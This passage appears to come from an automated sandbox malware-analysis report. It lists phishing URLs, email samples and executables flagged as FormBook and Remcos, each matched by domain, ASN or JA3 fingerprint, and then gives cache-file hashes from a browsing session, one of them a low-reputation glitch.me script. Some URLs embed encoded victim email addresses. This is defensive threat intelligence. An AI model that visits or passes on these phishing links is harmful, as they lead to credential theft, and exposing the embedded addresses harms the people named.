code.jquery.com	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://sagilityhealth.com	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/#?email=a2V2aW4uai5oYW5zZW5AeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse	151.101.130.137
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	151.101.2.137
	https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
cdnjs.cloudflare.com	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/#?email=a2V2aW4uai5oYW5zZW5AeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	payment.html	Get hash	malicious	Phisher	Browse	104.17.24.14
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661	Get hash	malicious	Phisher	Browse	104.17.25.14
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://sagilityhealth.com	Get hash	malicious	Unknown	Browse	104.22.70.197
	https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	Unknown	Browse	172.67.190.237
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	HTMLPhisher	Browse	172.67.190.237
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/#?email=a2V2aW4uai5oYW5zZW5AeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5%3aMKiHAE&at=9	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	payment.html	Get hash	malicious	Phisher	Browse	188.114.96.3
	Groupe ECADE_00_Paiement de facture_9911.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	URBAN CORPS.pdf	Get hash	malicious	Unknown	Browse	52.146.76.30
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	52.109.76.243
	https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5%3aMKiHAE&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	104.47.73.156
	Untitled.msg	Get hash	malicious	HTMLPhisher	Browse	52.109.28.46
	https://app.box.com/s/0818uk4femepnk27set00nsfufvakx91	Get hash	malicious	HTMLPhisher	Browse	52.98.242.242
	https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661	Get hash	malicious	Phisher	Browse	13.107.246.42
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse	13.107.246.60
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	52.168.117.173
	https://eplogisticademexico-my.sharepoint.com/personal/natalyar_eplogistics_com1/_layouts/15/guestaccess.aspx?e=5%3aIF7Pg7&at=9&share=ElyrWNLgmPNHoLatr5CK5xABy6AUzd-VUKQ5lFH-DHWgkA	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
AMAZON-AESUS	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	3.227.135.8
	http://sagilityhealth.com	Get hash	malicious	Unknown	Browse	44.195.204.217
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	18.208.94.120
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/#?email=a2V2aW4uai5oYW5zZW5AeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher	Browse	3.227.135.8
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	3.227.135.8
	https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661	Get hash	malicious	Phisher	Browse	3.5.29.70
	Service Desk - Please verify your Account!.eml	Get hash	malicious	HTMLPhisher	Browse	34.225.136.154
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=	Get hash	malicious	HTMLPhisher	Browse	3.227.135.8
	http://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqg	Get hash	malicious	HTMLPhisher	Browse	44.197.227.46
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	44.221.84.105
MICROSOFT-CORP-MSN-AS-BLOCKUS	URBAN CORPS.pdf	Get hash	malicious	Unknown	Browse	52.146.76.30
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	52.109.76.243
	https://truecommerceedi-my.sharepoint.com/:o:/g/personal/doug_linek_truecommerce_com/EiyWH-QHx4BNkzCWTtkFfUIB_LOEdcSk9TIJqvvJ9XzR1g?e=5%3aMKiHAE&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	104.47.73.156
	Untitled.msg	Get hash	malicious	HTMLPhisher	Browse	52.109.28.46
	https://app.box.com/s/0818uk4femepnk27set00nsfufvakx91	Get hash	malicious	HTMLPhisher	Browse	52.98.242.242
	https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661	Get hash	malicious	Phisher	Browse	13.107.246.42
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse	13.107.246.60
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	52.168.117.173
	https://eplogisticademexico-my.sharepoint.com/personal/natalyar_eplogistics_com1/_layouts/15/guestaccess.aspx?e=5%3aIF7Pg7&at=9&share=ElyrWNLgmPNHoLatr5CK5xABy6AUzd-VUKQ5lFH-DHWgkA	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	URBAN CORPS.pdf	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26 184.28.90.27
	http://sagilityhealth.com	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27
	https://hr.economictimes.indiatimes.com/etl.php?url=//uiytrewrtyuiouyt.pages.dev/	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3A%2F%2Flodgesonvashon.us11.list-manage.com%2Ftrack%2Fclick%3Fu%3D7bd9671a0b3250a7fef40b908%26id%3Dd8775abc58%26e%3D176d192631&umid=dd8a56c0-7dd4-4bb3-bb0e-81b56ebc53fa&auth=f59947c46ffdca8529044338828c8694fe545b0c-e8ce5e3cd8a069926d864ab292898eb1f0993e46	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26 184.28.90.27
	payment.html	Get hash	malicious	Phisher	Browse	52.165.165.26 184.28.90.27
	Groupe ECADE_00_Paiement de facture_9911.pdf	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27
	http://yournewstech.com	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27
	Untitled.eml	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26 184.28.90.27
	https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2flodgesonvashon.us11.list%2dmanage.com%2ftrack%2fclick%3fu%3d7bd9671a0b3250a7fef40b908%26id%3d9037f6334e%26e%3d176d192631&umid=c3b5e576-eabb-43b1-b355-8b3314499765&auth=f59947c46ffdca8529044338828c8694fe545b0c-470863c8cfe4c44d03e20bf02e2ceab308b9cbff	Get hash	malicious	Unknown	Browse	52.165.165.26 184.28.90.27

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
Category:	downloaded
Size (bytes):	1173
Entropy (8bit):	7.811199816788843
Encrypted:	false
SSDEEP:	24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
MD5:	5C7ACF60A2ACAA5C54BF2B2EC6D484D8
SHA1:	F1837FD5DB6DAD498148D7D77438DE693114B042
SHA-256:	EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
SHA-512:	11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
Preview:	..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[..)..=.....z.?/.._......\|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...\|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.S..wM.,../.\|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.\|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	troff or preprocessor input, ASCII text, with very long lines (372)
Category:	downloaded
Size (bytes):	37414
Entropy (8bit):	4.82325822639402
Encrypted:	false
SSDEEP:	768:mmMtI+A4CSIDqvnI+YTBrFPvVrJjhiRAiiEL:mXtI+A4GDUI+Y9rpVljhiIEL
MD5:	C495654869785BC3DF60216616814AD1
SHA1:	0140952C64E3F2B74EF64E050F2FE86EAB6624C8
SHA-256:	36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
SHA-512:	E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
Preview:	/!. Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). /./ FONT PATH. * -------------------------- /.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./ makes the font 33% larger relative to the icon container */..

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	86375
Entropy (8bit):	5.204581393148357
Encrypted:	false
SSDEEP:	1536:kDRkiSiD2ks/QQefAClHa7ism0l6KVXAKoGcJePOhYg:ktkicz5Z7n6KVXPoGcJeDg
MD5:	3C251732C3853CDF318BD284937A5C15
SHA1:	014AC0B239D117CDC85F463165AE74DB61705580
SHA-256:	09EB533A5FD70272DE744F9CA0FF7B9CA0AF77C6675440F290E4A7459629627C
SHA-512:	95FB23D944D5BECBF0B85647A1562CBFA875A90528E022E741CDA12B95F6D40F7AB8BC44EFD1D873CBF8144456B9D3497C6BC4DFD5C56B3EC8564C2388358CD3
Malicious:	false
Reputation:	low
URL:	https://rounded-screeching-script.glitch.me/set.js
